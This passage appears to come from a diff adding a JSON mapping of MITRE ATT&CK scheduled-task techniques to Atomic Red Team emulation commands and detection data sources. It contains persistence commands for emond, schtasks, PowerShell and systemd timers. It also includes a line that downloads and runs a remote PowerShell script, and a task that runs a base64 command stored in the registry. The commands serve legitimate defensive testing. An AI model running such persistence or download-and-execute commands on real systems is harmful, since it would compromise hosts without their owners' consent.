"Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1053.004", + "command_list": [ + "sudo cp $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist #{script_destination}\nsudo touch /private/var/db/emondClients/#{empty_file}\n", + "sudo cp #{script_location} /etc/emond.d/rules/atomicredteam_T1053_004.plist\nsudo touch /private/var/db/emondClients/#{empty_file}\n", + "sudo cp #{script_location} #{script_destination}\nsudo touch /private/var/db/emondClients/randomflag\n" + ], + "commands": [ + { + "command": "sudo cp $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist #{script_destination}\nsudo touch /private/var/db/emondClients/#{empty_file}\n", + "source": "atomics/T1053.004/T1053.004.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Launchd" + }, + { + "command": "sudo cp #{script_location} /etc/emond.d/rules/atomicredteam_T1053_004.plist\nsudo touch /private/var/db/emondClients/#{empty_file}\n", + "source": "atomics/T1053.004/T1053.004.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Launchd" + }, + { + "command": "sudo cp #{script_location} #{script_destination}\nsudo touch /private/var/db/emondClients/randomflag\n", + "source": "atomics/T1053.004/T1053.004.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Launchd" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.004", + "display_name": "Scheduled Task/Job: Launchd", + "atomic_tests": [ + { + "name": "Event Monitor Daemon Persistence", + "auto_generated_guid": "11979f23-9b9d-482a-9935-6fc9cd022c3e", + "description": "This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. \n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "script_location": { + "description": "evil plist location", + "type": "Path", + "default": "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist" + }, + "script_destination": { + "description": "Path where to move the evil plist", + "type": "Path", + "default": "/etc/emond.d/rules/atomicredteam_T1053_004.plist" + }, + "empty_file": { + "description": "Random name of the empty file used to trigger emond service", + "type": "String", + "default": "randomflag" + } + }, + "executor": { + "name": "bash", + "elevation_required": true, + "command": "sudo cp #{script_location} #{script_destination}\nsudo touch /private/var/db/emondClients/#{empty_file}\n", + "cleanup_command": "sudo rm #{script_destination}\nsudo rm /private/var/db/emondClients/#{empty_file}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1053.005", + "command_list": [ + "schtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\"\nschtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\n", + "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST #{time}\n", + "SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST 20:10\n", + "SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"C:\\windows\\system32\\cmd.exe\" /SC daily /ST #{time}\n", + "SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST 20:10\n", + "SCHTASKS /Create /S localhost /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "SCHTASKS /Create /S #{target} /RU DOMAIN\\user /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "SCHTASKS /Create /S #{target} /RU #{user_name} /RP At0micStrong /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "$Action = New-ScheduledTaskAction -Execute \"calc.exe\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTask -InputObject $object\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"Word\" -sub \"Scheduler\"\n", + "$xml = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1053.005\\src\\T1053_005_WMI.xml\")\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"RegisterByXml\" -Arguments @{ Force = $true; Xml =$xml; }\n", + "reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f\nschtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 07:45\n" + ], + "commands": [ + { + "command": "schtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\"\nschtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST #{time}\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST 20:10\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"C:\\windows\\system32\\cmd.exe\" /SC daily /ST #{time}\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST 20:10\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /S localhost /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /S #{target} /RU DOMAIN\\user /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /S #{target} /RU #{user_name} /RP At0micStrong /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "$Action = New-ScheduledTaskAction -Execute \"calc.exe\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTask -InputObject $object\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"Word\" -sub \"Scheduler\"\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "$xml = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1053.005\\src\\T1053_005_WMI.xml\")\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"RegisterByXml\" -Arguments @{ Force = $true; Xml =$xml; }\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f\nschtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 07:45\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.005", + "display_name": "Scheduled Task/Job: Scheduled Task", + "atomic_tests": [ + { + "name": "Scheduled Task Startup Script", + "auto_generated_guid": "fec27f65-db86-4c2d-b66c-61945aee87c2", + "description": "Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view\nthe tasks, open the Task Scheduler and look in the Active Tasks pane.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "schtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\"\nschtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\n", + "cleanup_command": "schtasks /delete /tn \"T1053_005_OnLogon\" /f >nul 2>&1\nschtasks /delete /tn \"T1053_005_OnStartup\" /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Scheduled task Local", + "auto_generated_guid": "42f53695-ad4a-4546-abb6-7d837f644a71", + "description": "Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "task_command": { + "description": "What you want to execute", + "type": "String", + "default": "C:\\windows\\system32\\cmd.exe" + }, + "time": { + "description": "What time 24 Hour", + "type": "String", + "default": "20:10" + } + }, + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}\n", + "cleanup_command": "SCHTASKS /Delete /TN spawn /F >nul 2>&1\n" + } + }, + { + "name": "Scheduled task Remote", + "auto_generated_guid": "2e5eac3e-327b-4a88-a0c0-c4057039a8dd", + "description": "Create a task on a remote system.\n\nUpon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "task_command": { + "description": "What you want to execute", + "type": "String", + "default": "C:\\windows\\system32\\cmd.exe" + }, + "time": { + "description": "What time 24 Hour", + "type": "String", + "default": "20:10" + }, + "target": { + "description": "Target", + "type": "String", + "default": "localhost" + }, + "user_name": { + "description": "Username to authenticate with, format: DOMAIN\\User", + "type": "String", + "default": "DOMAIN\\user" + }, + "password": { + "description": "Password to authenticate with", + "type": "String", + "default": "At0micStrong" + } + }, + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "cleanup_command": "SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN \"Atomic task\" /F >nul 2>&1\n" + } + }, + { + "name": "Powershell Cmdlet Scheduled Task", + "auto_generated_guid": "af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd", + "description": "Create an atomic scheduled task that leverages native powershell cmdlets.\n\nUpon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "$Action = New-ScheduledTaskAction -Execute \"calc.exe\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTask -InputObject $object\n", + "cleanup_command": "Unregister-ScheduledTask -TaskName \"AtomicTask\" -confirm:$false >$null 2>&1\n" + } + }, + { + "name": "Task Scheduler via VBA", + "auto_generated_guid": "ecd3fa21-7792-41a2-8726-2c5c673414d3", + "description": "This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute \"notepad.exe\" within\n30 - 40 seconds after this module has run\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ms_product": { + "description": "Maldoc application Word", + "type": "String", + "default": "Word" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft #{ms_product} must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"#{ms_product}.Application\" | Out-Null\n $process = \"#{ms_product}\"; if ( $process -eq \"Word\") {$process = \"winword\"}\n Stop-Process -Name $process\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft #{ms_product} manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n", + "name": "powershell" + } + }, + { + "name": "WMI Invoke-CimMethod Scheduled Task", + "auto_generated_guid": "e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b", + "description": "Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "$xml = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1053.005\\src\\T1053_005_WMI.xml\")\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"RegisterByXml\" -Arguments @{ Force = $true; Xml =$xml; }\n", + "cleanup_command": "Unregister-ScheduledTask -TaskName \"T1053_005_WMI\" -confirm:$false >$null 2>&1\n" + } + }, + { + "name": "Scheduled Task Executing Base64 Encoded Commands From Registry", + "auto_generated_guid": "e895677d-4f06-49ab-91b6-ae3742d0a2ba", + "description": "A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created.\nThe scheduled task will launch powershell to decode and run the command in the rgistry daily.\nThis is a persistence mechanism recently seen in use by Qakbot. \n\n[Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "time": { + "description": "Daily scheduled task execution time", + "type": "string", + "default": "07:45" + } + }, + "executor": { + "command": "reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f\nschtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st #{time}\n", + "cleanup_command": "schtasks /delete /tn \"ATOMIC-T1053.005\" /F >nul 2>&1\nreg delete HKCU\\SOFTWARE\\ATOMIC-T1053.005 /F >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1053.006", + "command_list": [ + "echo \"[Unit]\" > /etc/systemd/system/art-timer.service\necho \"Description=Atomic Red Team Systemd Timer Service\" >> /etc/systemd/system/art-timer.service\necho \"[Service]\" >> /etc/systemd/system/art-timer.service\necho \"Type=simple\" >> /etc/systemd/system/art-timer.service\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> /etc/systemd/system/art-timer.service\necho \"[Install]\" >> /etc/systemd/system/art-timer.service\necho \"WantedBy=multi-user.target\" >> /etc/systemd/system/art-timer.service\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> #{path_to_systemd_service}\necho \"[Unit]\" > /etc/systemd/system/art-timer.timer\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> /etc/systemd/system/art-timer.timer\necho \"Requires=#{systemd_service_name}\" >> /etc/systemd/system/art-timer.timer\necho \"[Timer]\" >> /etc/systemd/system/art-timer.timer\necho \"Unit=#{systemd_service_name}\" >> /etc/systemd/system/art-timer.timer\necho \"OnCalendar=*-*-* *:*:00\" >> /etc/systemd/system/art-timer.timer\necho \"[Install]\" >> /etc/systemd/system/art-timer.timer\necho \"WantedBy=timers.target\" >> /etc/systemd/system/art-timer.timer\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> #{path_to_systemd_service}\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=art-timer.service\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=art-timer.service\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> #{path_to_systemd_service}\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=#{systemd_service_name}\" >> 